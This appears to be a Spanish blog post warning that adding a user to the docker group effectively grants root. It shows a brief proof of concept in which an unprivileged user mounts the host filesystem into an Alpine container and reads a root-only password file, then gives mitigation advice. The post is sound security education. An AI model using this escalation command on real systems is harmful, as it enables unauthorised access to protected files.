📆 Publicado el

Docker puede ser un problema de seguridad en tu sistema

5 min de lectura
Autor

Docker nació (o mejor dicho, fue presentado al público) en la PyCon de 2013 en una charla titulada "The future of Linux Containers". Recomiendo ver el video que aparece a continuación (son menos de 6 minutos) y disfrutar del hecho de que en la informática, estamos viviendo lo que en un futuro será la "historia del desarrollo de software".

Y es que los Albert Einstein del software como Linus Torvalds, Robert C. Martin, Martin Fowler, Guido Van Rossum o muchos de los inventores de lenguajes de programación que se encuentran en el 99% del software que utilizamos, están vivos a día de hoy.

Pero volviendo al tema de Docker. Docker no trajo consigo la tecnología de contenedores que se usa en Linux. Esto es algo que lleva existiendo desde hace más de 20 años con diferentes nombres como Chroot en 1979, Jails en el 2000 y contenedores a partir de 2004. Pero no fue hasta el 2013 cuando esta tecnología se empezó a utilizar por la mayoría de la gente.

La verdadera ventaja que trajo Docker, fue la posibilidad de intercambiar imágenes de contenedores entre sistemas de una forma sencilla con los manifiestos Dockerfile y todo el ecosistema de alrededor. Pero no está libre de ser juzgado por mucha gente.

Uno de los problemas que se le achaca a Docker es que Docker Daemon se ejecuta como Root. Y esto trae implicaciones indirectas como veremos a continuación.

Cuando instalamos Docker siguiendo el tutorial su página oficial, nos invita a seguir un proceso post-instalación en la siguiente página donde nos enseñan que podemos ejecutar Docker sin permisos de root, metiendo a un usuario normal al grupo de Docker. Y es que aquí está la clave del problema. Podemos llegar a pensar que ejecutar Docker con un usuario normal es más seguro, cuando eso no cambia nada y de hecho, te da una sensación de seguridad que puede resultarte caro como veremos en la prueba de concepto.

Por romper una lanza a favor de ellos, en esa misma página podemos encontrar el cuadro a continuación.

Y es que si, todos (o al menos yo alguna vez) solemos pasar por alto este tipo de mensajes si es que hemos llegado a verlos, porque en la mayoría de los blogs donde nos enseñan a instalar Docker en nuestro sistema directamente no nos previenen del riesgo de tener un usuario "sin privilegios" en el grupo de Docker. Además, "eso de Daemon Attack Surface a mi me suena a chino" 😎.

Prueba de concepto

1. Contexto del problema

Tenemos 2 usuarios en nuestro sistema, root y demo.

──[root@parrot][/root]──# id
uid=0(root) gid=0(root) grupos=0(root)
──[demo@parrot][/home/demo]$ id
uid=1001(demo) gid=1003(demo) grupos=1003(demo),1000(docker)

Como vemos, demo está en el grupo Docker para poder lanzar contenedores y realizar su gestión. Como demo es un usuario con pocos privilegios, además, es un poco con el que solemos hacer todo pensando que así estamos más seguros.

2. El archivo "protegido" de root

Hay un archivo en /home que se llama password.txt. Este archivo, en principio, tiene permisos 400 para que solo el usuario root pueda leer su contenido.

──[root@parrot][/home]──# ls -l
total 4
drwxr-xr-x 1 demo demo 204 Feb 13 21:00 demo
-r-------- 1 root root  16 Feb 13 21:03 password.txt
drwxr-xr-x 1 user user 614 Feb 13 19:53 user

Si no conoces como funcionan los permisos de Linux no pasa nada, simplemente créete la siguiente afirmación de lo que ocurre.

Ningún otro usuario, ni grupo del sistema, puede acceder al contenido del archivo password.txt con los permisos actuales.

Si aún así intentamos leer su contenido con el usuario demo, vemos el siguiente error.

──[demo@parrot][~/demo]───$ cat /home/password.txt 
cat: /home/password.txt: Permiso denegado

Hasta aquí todo bien, ¿correcto?

3. Docker Daemon Attack Surface

A continuación, el usuario demo, el que no tenía privilegios, el que no podía leer el contenido de root, crea un contenedor del siguiente modo.

──[demo@parrot][~/demo]───$ docker run -v /:/vulnerable -it alpine /bin/sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
59bf1c3509f3: Pull complete 
Digest: sha256:21a3deaa0d32a8057914f36584b5288d2e5ecc984380bc0118285c70fa8c9300
Status: Downloaded newer image for alpine:latest
/ #

Y una vez, dentro del contenedor, empieza la magia 🧙‍♂️.

/ # whoami
root
/ # cat vulnerable/home/password.txt
P0wn3dP@ssw0rd!

Es decir, un usuario sin privilegios, fuera del contexto de los contenedores no teníamos acceso a los archivos que root controlaba.

Dentro del contexto de los contenedores, si mapeamos en un volumen la raíz de todo el disco a una ruta del contenedor, tendremos control total de los archivos del sistema.

4. Conclusión

¿Es el título del post clickbait? En parte sí. Más que una vulnerabilidad es un problema de no tener las cosas bien configuradas.

¿La página oficial de Docker podría explicar el problema o señalarlo de una mejor forma? Seguro que también.

La realidad es que ellos no tienen la culpa. En su misma página explican todo esto. Y la realidad también es que poca gente es conocedora de este problema de "mala configuración". Es responsabilidad de todos hacer pedagogía y explicarles a nuestros compañeros los riesgos que acarrea según que cosas y yo, con este post, dejo mi granito de arena.

¿Cómo deberías mitigar esto? Teniendo en mente que el usuario con el que gestionas Docker es como un usuario root. Protégelo con una buena contraseña y aíslalo del resto de cosas que haces en el sistema.